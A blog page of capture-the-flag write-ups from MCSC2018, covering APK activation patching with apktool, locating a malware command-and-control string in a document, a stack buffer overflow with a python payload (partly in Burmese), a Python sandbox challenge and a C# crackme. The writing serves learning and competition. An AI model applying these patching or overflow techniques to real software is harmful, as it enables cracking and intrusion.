[MCSC] patch me bro-100pts - Writeup [/Misc]

Challenge description is "Patch this app", so we need to modify the application, and recompile, change bit something like that.
First I download the challenge file, the challenge provide mobile application ( apk ) file.
Just try to decompile with d2j-dex2jar to get a more readable source code with java version, and that will more easier to help you to understand with java language.



In MainActivity.class function, we can see the clearly at source code,
String isActivated = "0";
isActivated is already initialized with value "0"

in checkActivation() function
that compare isActivated with "1",
if not equal "You are not activated yet" bad boy message
if equal "Congraulations , You have patched challenge" good boy message.

so let's make a patch "0" to "1" at the isActivated variable.
first we need to decompile the apk file with apktool to get a smali code.

apktool d mcsc_misc2.apk



in ./mcsc_misc2/smali/myanmar/mcsc/challenge2/MainActivity.smali file

change "0"


to "1"



and recompile the smali source with apktool
apktool b mcsc_misc2/



the application needed to be signed before install at the android, I used the jarsigner to sign the applicaion.

 

Now, the patched application ready to install at the android.



Just click the CHECK PATCH button to get the flag!! yay!

Decrypted text: this is testing

just the fix with the flag format mcsc{} , and then I got the flag.

flag : mcsc{this is testing}




This is seventh challenge that I solved in MCSC2018.

but this time we are not first solver team.

Noted

Just updated text

12.07.2020

I want to say thank you to challenge creator.

[MCSC] Find the Tom's Address-50pts - Writeup [/Forensic]

Honestly, I don't know about forensics, I just only have a little knowledge.
One of my team member said "Hey, can you check this. there is some obfuscated code inside doc".

At first I read about the challenge description, Opps I need to find the address of Tom. The challenge provide doc file, I quick lookup with Microsoft office in vm,
I saw some text from wikipedia.


I thought, I need to find the real address of Tom -_-
yes! I did at that time.


I copy some text from wikipedia and try to diff, but nothing special. ( Some of challenge, the challenge creator hide the secret word in text that why I try to diff )
So moved to obfuscated code!!



I search in the doc file with microsoft office, I found another doc file? ( Tom History )


copy that file to desktop.

the file name change to mcsc2.bat



I open with Notepad++.

I saw the content of file.



There is two line.
First line is not readable, the second line is obfuscated powershell code
I removed the first line, and I change the view style to "word warp" ( In notepad++ View >> Word warp )



Now we can see some more code.

I try to decode obfuscated powershell code, but that take too much time may be I haven't not  experienced it before.
So I ignored this challenge at that time. and I play with another challenge.
The first part of competition ended in 12:00PM.

After competition started the second part of time.
the challenge creator announces some hints to us.
"There is a malware in that doc, you need to find the command & control address, you don't need to do any decoding"

I look again the challenge, I already got the content of malware file.
So I search again in that poertshell code,something similar like that "mcsc|http|80|443|8080|8888".

and I saw something.






So, decode the a part of the flag

("{0}{4}{2}{1}{6}{7}{8}{5}{9}{3}"-f 'ht','c.','/mcs','uu:80','tp:/','f0UND','h3yJe','rr','y','u')



I decode with python
and got the flag.

mcsc{h3yJerryf0UNDuuu}




 



This challenge already came out the first part time of ctf, but we solved in second part of time.
(Note I made a submit so many wrong flags in this challenge )

This is sixth challenge that I solved in MCSC2018.

And the first solver team of that challenge, so we got another bonus (1 point ). yay!

I want to say thank you to challenge creator.

[MCSC] babypwn-100pts - Writeup [/PWN]

ပထမဆံုး file command နဲ့ တစ္ခ်က္စစ္ျကည့္လိုက္မယ္




 32 bit elf file ပါ။
က်ြန္ေတာ္ ပထမဆံုးလုပ္တာကေတာ့ binary file ကို run ျကည့္တာပါ။
ပထမ တစ္ခါ run တယ္ AAAA input ထည့္ျကည္တယ္ program က normal exit ျဖစ္သြားတယ္
ေနာက္တစ္ခါ buffer overflow ျဖစ္ေလာက္ေစမဲ့ buffer size ကို ထည့္ျကည့္တယ္
buffer overflow ျဖစ္သြားတယ္ [ Segmentation fault (core dumped) ]




 
buffer overflow ျဖစ္သြားတယ္ ဆိုေတာ့ buffer offset size ကို ရွာရပါမယ္။

Ok let open with gdb,

ဒီေနရာမွာတစ္ခုသိထားရမွာက stripped binary ျဖစ္ေနတာပါ။ ဒါေျကာင့္ function name ေတြ က remove လုပ္ထားပါတယ္။ 

binary file က entry point ကို စရွာရပါတယ္။  ( stripped binary ျဖစ္ေနတဲ့ အတြက္ေျကာင့္ပါ )



Entry point: 0x8048420
ဒီလိုဆိုရင္ entry point address ကို ရပါျပီ။




main function ကေန 0x8048531 function ကို ထပ္ေခါ္ထားတာပါ။
0x8048531 ကို ထပ္ျပီး disassemble လုပ္ျကည့္ပါမယ္။



ပံုမွာ ျမင္ရတဲ့အတိုင္း
mov    DWORD PTR [ebp-0x4],0xdeadc0de
variable တစ္ခုကို 0xdeadc0de assign လုပ္လုိက္တယ္ ။
lea    eax,[ebp-0x68]
buffer size ကို 0x68 = 104 ဆိုျပီးေျကညာတယ္။
ျပီးေတာ့
mov    DWORD PTR [esp+0x4],eax 
esp+0x4 address မွာ eax pointer ကို store လုပ္လိုက္တယ္။ scanf ရဲ့ argument 1 အေနနဲ့ေပါ့
mov    DWORD PTR [esp],0x8048702
ဒါကေတာ့ scanf ရဲ့ argument 0 ကို "%s" strings input လုပ္မယ္လို့ ေျကညာလိုက္တာပါ။

ျပီးေတာ့
call   0x8048410 <__isoc99_scanf@plt>
scanf() function ကိုေခါ္လိုက္တယ္ ။ ဒီေနရာမွာ buffer overflow attack ကို ျဖစ္ေပါ္ေစတာပါ။



ေနာက္ဆံုးမွာ ေတာ့
cmp    DWORD PTR [ebp-0x4],0xdeadbeef

နဲ့ compare လုပ္ပါတယ္ အေပါ္မွာ တည္းက ebp-0x4 ကို 0xdeadc0de  stored လုပ္ထားျပီးသား ပါ။
တကယ္လို့သာ က်ြန္ေတာ္ တို့ 0x68 buffer size ထက္ပိုတဲ့ buffer size ကို input ထည့္လိုက္မယ္ဆိုရင္ ebp-0x4 ကို overwrite လုပ္လို့ရမွာျဖစ္ပါတယ္။
ဒီေနရာမွာ break point ကို နွစ္ေနရာ သတ္မွတ္ပါမယ္ scanf function မေခါ္ခင္နဲ့ ေခါ္ျပီးတဲ့ အခ်ိန္။
ပထမ breakpoint ကို 0x0804858e မွာ ဒုတိယ breakpoint ကို 0x0804859a မွာ break point သတ္မွတ္ျပီး
program ကို run လိုက္ပါ့မယ္
program run ျပီးတဲ့ အခ်ိန္မွာ ေတာ့ ပထမ breakpoint ကို ေရာက္သြားပါမယ္။
ေအာက္က ပံုကို ျကည့္ျကည့္ပါ။



$ebp-0x4 မွာ 0xdeadc0de ဆိုတဲ့ value ကို assign လုပ္ထားပါတယ္။
ျပီးေတာ့ program ကို continue လုပ္မယ္။

input ကို A*100+"BBBB" ( AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB )
ထည့္ျပီး

Enter ရိုက္လိုက္ရင္ ဒုတိယ
break point ရွိတဲ့ ေနရာမွာ program က pause ျဖစ္သြားပါလိမ့္မယ္။



program pause ျဖစ္သြားတဲ့ အခါမွာ
$bpx-0x4 address မွာ ဘယ္ value ေတြ overwrite ျဖစ္သြားလဲ ဆိုတာကို သိဖို့
x/wx $ebp-0x4
ျပီးရိုက္ျကည့္လိုက္တဲ့ အခါမွာေတာ့ 0x42424242
ဆိုျပီးျဖစ္ေနပါျပီ 42 က ေတာ့ B ရဲ့ hex value ျဖစ္ပါတယ္
ဒါဆိုရင္ေတာ့ $ebp-0x4 address ကို overwrite လုပ္နိုင္ခဲ့ပါျပီ။ 



ပံုမွာ ျမင္ရတဲ့ အတိုင္း $ebp-0x4 က 0xdeadbeef နဲ့ ညီခဲ့ရင္ flag ကို ရမွာ ျဖစ္ျပီး၊ မညီခဲ့ရင္ေတာ့
0x80485b6 ကို jump သြားမွာျဖစ္ပါတယ္။
ဒါေျကာင့္ က်ြန္ေတာ္ တို့က
$ebp-0x4 overwrite ျဖစ္သြားတဲ့ ေနရင္မွာ 0xdeadbeef
ကို overwrite ျဖစ္ေအာင္လုပ္ေပးရမွာ ဆိုေတာ့

python -c 'print "A"*100+"\xef\xbe\xad\xde"' > exp
ဒီေနရာမွာ  0xdeadbeef အစား "\xef\xbe\xad\xde" ကိုထည့္လိုက္လဲဆိုေတာ့ က little-enidan ျဖစ္ေနလို့ပါ။ Check Here
ျပီးေတာ့မွာ
gdb မွာ
r < exp
ဆိုျပီး ျပန္ run ျကည့္လိုက္တဲ့ အခါမွ



အခုဆိုရင္ေတာ့ $ebp-0x4 address ကို 0xdeadbeef overwrite လုပ္နိုင္သြားျပီ ျဖစ္ပါတယ္။
real server မွာ စမ္းျကည့္လိုက္တဲ့ အခါမွာ ေတာ့
flag ကို ရမွာ ျဖစ္ပါတယ္



Thank For Reading

This is fifth challenge that I solved in MCSC2018.

And the first solver team of that challenge, so we got another bonus (1 point ). yay!

I want to say thank you to challenge creator.

[MCSC] evilpython2-100pts - Writeup [/PWN]

After Solving the crackme2 challenge, I try to solve evilpython2-100pts.

This time, they also provide the source code



there are UNWANTED variable in this challenge.
but I try to use the payload that used in evilpython-50pts challenge.
that payload still working!!



Flag : mcsc{exec_is_evil_t00}
Bingo!





Thank For Reading.

This is fourth challenge that I solved in MCSC2018.

And the first solver team of that challenge, so we got another bonus (1 point ).

I want to say thank you to challenge creator.

[MCSC] CrackMe02-100pts - Writeup [/REVERSING]

At that time, I decided to solve that challenge!







When I downloaded the challenge file,
the challenge provided with two files( binary exe and library dll ) all are written with c#.
I quick lookup with CFF Explorer.



So we need to debug/decompiler.
And I used dnspy, that is a great tool for debug for c# program.

When I open binary exe with dnspy, I click the main entry point,



the main binary load another dll file ( System.Data.Win32.dll ) with ( Systems.Load.
And I clicked on "new D34783ADEFF89289127037FED9()", that debugger load another dll file ( System.Data.Win32.dll ), cool!
When dll file loaded, the program will start "InitializeComponent()"

 

wait!

In Line num 55 : this.label1.Text = Window.Forms("Sqfpp#Bmz#Hfz#wl#dvfpp##FBPWFQ#FDD-", 3);
That should be a plain text!
So there must decrypt function in dll file.

but there is another interesting key event hander
1 >           base.KeyDown += new KeyEventHandler(this.D34783ADEFF89289127037FED9_2);
2 >            base.KeyPress += new KeyPressEventHandler(this.D34783ADEFF89289127037FED9_1);

 

hum!
when we press Control+Alt+Shit+Keys.0D(0)

Applications.Exit() function will execute

OR
when press any key
Applications.Resume() function will execute

Note : " don't confuse with Application.Exit(), this just Application no char s"
let check what are these!



And I set the break point on both function.

And I debug the program, I press any key on my keyboard because I want to debug the Applications.Resume() function first.

The debugger break in Resume() breakpoint.



Press F11 on debugger ( that will debug to step into)
And I saw the decrypt function.



After set breakpoint in return line the stringbuilder2 variable, and I Press F5 stringbuilder2 variable become "wrong key"



ok just press F5 to continue the program.
let debug the Applications.Exit() function, So I press Ctrl+Alt+Shit+0,
The debugger break at Applications.Exit() function.
press F5 to continue,the debugger break at return stringBuilder2.ToString()
and I saw the flag in stringBuilder2 variable.
Yay!



flag : Myanmar_Cyber_Security_Challenge






Thank For Reading.

This is third challenge that I solved in MCSC2018.

And the first solver team of that challenge, so we got another bonus (1 point ).

I want to say thank you to Ko Myo Myint Htike who created this challenge.